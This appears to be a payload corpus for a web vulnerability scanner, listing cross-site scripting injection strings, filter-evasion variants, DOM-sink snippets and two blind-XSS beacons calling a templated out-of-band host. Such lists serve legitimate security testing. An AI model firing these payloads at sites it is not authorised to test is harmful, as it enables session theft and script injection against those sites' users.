# Extended XSS payload corpus consumed by the scanner.
# Lines beginning with # are ignored.
\"><img src=x onerror=alert(1)>
'><svg/onload=alert('huntsuite')>
\"onmouseover=\"alert(1)
javascript:alert(1)
#<img src=x onerror=alert(1)>
?redir=javascript:alert(1)
<script>document.write(location.hash.slice(1))</script>
<div id="output"></div><script>output.innerHTML = decodeURIComponent(location.search.slice(1))</script>
<img src=1 onerror=alert(document.cookie)>
<scr<script>ipt>alert(1)</scr</script>ipt>
<iframe src=java&Tab;script:alert(1)>
<svg/onload=alert&lpar;1&rpar;>
<img src=x onerror=alert\\1`>
 ,jaVasCript:/*-/*`/*`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1)//>
 <img src=x onerror=alert + \"1>
<iframe src=java%09script:alert(1)>
<object data=java%0ascript:alert(1)>
<svg><script>alert&#40;1&#41;</script>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
<math href="javascript:alert(1)">CLICK
<body onpageshow=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<keygen onfocus=alert(1) autofocus>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>
<form><button formaction=javascript:alert(1)>X
<isindex type=image src=1 onerror=alert(1)>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<svg/onload=setTimeout + \"alert\\x281\\x29>
<svg/onload=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>
<script>new Image().src='http://{{OOB}}/xss-{{RAND}}'</script>
"'><img src=x onerror="new Image().src='http://{{OOB}}/xss-{{RAND}}'">
